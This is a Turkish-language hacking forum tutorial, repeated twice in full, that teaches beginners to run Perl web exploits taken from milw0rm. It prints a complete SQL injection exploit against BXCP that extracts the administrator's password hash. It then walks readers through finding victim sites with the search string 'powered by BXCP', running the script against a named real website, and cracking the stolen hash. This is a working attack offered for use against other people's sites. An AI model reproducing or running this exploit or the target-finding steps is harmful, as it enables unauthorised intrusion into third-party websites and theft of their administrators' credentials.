Hiç bilmeyenler için perl exploit kullanımı hakkında bilgi vereceğim
ilk öncelikle perl programını indirmemiz ve kurmamız lazım
http://aspn.activestate.com/ASPN/Downloads/ActivePerl/
bu linkten çekin
daha sonra kendimize bir perl exploit buluyoruz
nasılmı www.milw0rm.com u açıyoruz
orda [web apps] başlığı altında yer alan exploitleri kullanacağız
bi kaç tanesine bakalım
mesela
BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit
bunu açtığımızda
karşımıza çıkan sayfanın en başında
#!/usr/bin/perl
gibi bir yazı varsa bu perl ile derlenmiş bir exploittir
bulduk çokda güncel bi exploit 7.ayın 2 sinde yayımlanmış
neyse exploit kodumuz:
#!/usr/bin/perl
use IO::Socket;
print q{
---------------------------------------------------------------------------
----------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored*
---------------------------------------------------------------------------
----------
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
$vic_id = $ARGV[2];
if (!$vic_id) { die "~ read how to use Wink \n"; }
$get = "http://".$webpage.$directory."index.php?mod=files&act ion= view&where=-1+UNI
ON+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0 ,0,0 ,0,0+FROM+{pre}_users+WHE
RE+users_id=";
$get .= $vic_id;
print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "
Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";
while ($answer = <$sock>) {
#print $answer;
if ($answer =~ /([0-9a-f]{32})\n/) {
print "~ hash: $1\n";
break;
}
}
close($sock);
# milw0rm.com [2006-07-02]
bu kodu notdefterine kopyalayıp yapıştırıyoruz
sonra c:\perl\bin altına .pl uzantılı kaydediyoruz
dikkat edin kayıt türü sekmesinden tüm dosyaları seçiyoruz
sonra örneğin x.pl die kaydediyoruz
googleden arıyoruz kıracağımız siteleri
"powered by BXCP"
BXCP exploiti olduğu için
sitelerimizi buluyoruz
bu aşamadan sonra yapılacak iş perli çalıştırmak
başlattan çalıştıra gelip
cmd yazıyoruz
sonra dos komut penceresi geliyor
sırasi ile
cd.. yaz enterla
cd.. yaz enterla
komut dizinimiz c:\> olacak hale gelsin
sonra cd perl yazın enterlayın
cd bin yazın enterlayın
c:\perl\bin> elde edicez
bu halde iken
c:\perl\bin>perl x.pl yazıp enterlıyoruz
bize exploitin nasıl kullanılacğını söylüyor
use: bxcp.pl [server] [dir] [id]
kullanım: x.pl [server] [uzantı] [id yani kimlik admin için 1 giricez]
hemen başlıyoruz komut girmeye
C:\Perl\bin>perl x.pl www.flexible-gaming.de / 1
ve hash elimizde bunu gene milw0rmda kırıyoruz
perlle yazılmış exploitlerde mantık budur
önce nasıl çalıştığını öğreniriz
sonra uygularız
hepsi bu kadar umarım kapmışsınızdır bişiler
Ayrıca arkadaşlar bu sorular çok sık soruluyor : Şöyle diyebilirsiniz,C:\Perl\bin>perl x.pl www.flexible-gaming.de
/ 1 arkadaşlar burası neden 1 orayı anlamıyom ben burayı neye göre
karar veriysunuz diye sorabilirsiniz ben size hemen açıklamasını
yapim.Bu rakamın 1 olması demek arkdaşlar sitedeki ilk kullanıcıyı
gösterir.Düşünelim sitedeki ilk kullanıcı kimdir ?tabiki ADMİN
dir.Böylece adminin şifresini ele geçiririz.
ilk öncelikle perl programını indirmemiz ve kurmamız lazım
http://aspn.activestate.com/ASPN/Downloads/ActivePerl/
bu linkten çekin
daha sonra kendimize bir perl exploit buluyoruz
nasılmı www.milw0rm.com u açıyoruz
orda [web apps] başlığı altında yer alan exploitleri kullanacağız
bi kaç tanesine bakalım
mesela
BXCP <= 0.3.0.4 (where) Remote SQL Injection Exploit
bunu açtığımızda
karşımıza çıkan sayfanın en başında
#!/usr/bin/perl
gibi bir yazı varsa bu perl ile derlenmiş bir exploittir
bulduk çokda güncel bi exploit 7.ayın 2 sinde yayımlanmış
neyse exploit kodumuz:
#!/usr/bin/perl
use IO::Socket;
print q{
---------------------------------------------------------------------------
----------
BXCP exploit by x23 ~ curse-crew.de ~ geekbar.cx.la ~ geeknet.uttx.net
use: bxcp.pl [server] [dir] [id]
sample:
$ perl bxcp.pl bxcp.com / 1
~ connecting
~ exploiting
~ hash: *censored*
---------------------------------------------------------------------------
----------
};
$webpage = $ARGV[0];
$directory = $ARGV[1];
$vic_id = $ARGV[2];
if (!$vic_id) { die "~ read how to use Wink \n"; }
$get = "http://".$webpage.$directory."index.php?mod=files&act ion= view&where=-1+UNI
ON+";
$get .= "SELECT+users_nick,0,users_pwd,0,0,0,0,0,0,0,0 ,0,0 ,0,0+FROM+{pre}_users+WHE
RE+users_id=";
$get .= $vic_id;
print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage",
PeerPort=>"80") || die "
Can't connect to Server\n";
print "~ exploiting\n";
print $sock "GET $get HTTP/1.1\n";
print $sock "Host: $webpage\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4\n";
print $sock "Connection: close\n\n";
while ($answer = <$sock>) {
#print $answer;
if ($answer =~ /([0-9a-f]{32})\n/) {
print "~ hash: $1\n";
break;
}
}
close($sock);
# milw0rm.com [2006-07-02]
bu kodu notdefterine kopyalayıp yapıştırıyoruz
sonra c:\perl\bin altına .pl uzantılı kaydediyoruz
dikkat edin kayıt türü sekmesinden tüm dosyaları seçiyoruz
sonra örneğin x.pl die kaydediyoruz
googleden arıyoruz kıracağımız siteleri
"powered by BXCP"
BXCP exploiti olduğu için
sitelerimizi buluyoruz
bu aşamadan sonra yapılacak iş perli çalıştırmak
başlattan çalıştıra gelip
cmd yazıyoruz
sonra dos komut penceresi geliyor
sırasi ile
cd.. yaz enterla
cd.. yaz enterla
komut dizinimiz c:\> olacak hale gelsin
sonra cd perl yazın enterlayın
cd bin yazın enterlayın
c:\perl\bin> elde edicez
bu halde iken
c:\perl\bin>perl x.pl yazıp enterlıyoruz
bize exploitin nasıl kullanılacğını söylüyor
use: bxcp.pl [server] [dir] [id]
kullanım: x.pl [server] [uzantı] [id yani kimlik admin için 1 giricez]
hemen başlıyoruz komut girmeye
C:\Perl\bin>perl x.pl www.flexible-gaming.de / 1
ve hash elimizde bunu gene milw0rmda kırıyoruz
perlle yazılmış exploitlerde mantık budur
önce nasıl çalıştığını öğreniriz
sonra uygularız
hepsi bu kadar umarım kapmışsınızdır bişiler
Ayrıca arkadaşlar bu sorular çok sık soruluyor : Şöyle diyebilirsiniz,C:\Perl\bin>perl x.pl www.flexible-gaming.de
/ 1 arkadaşlar burası neden 1 orayı anlamıyom ben burayı neye göre
karar veriysunuz diye sorabilirsiniz ben size hemen açıklamasını
yapim.Bu rakamın 1 olması demek arkdaşlar sitedeki ilk kullanıcıyı
gösterir.Düşünelim sitedeki ilk kullanıcı kimdir ?tabiki ADMİN
dir.Böylece adminin şifresini ele geçiririz.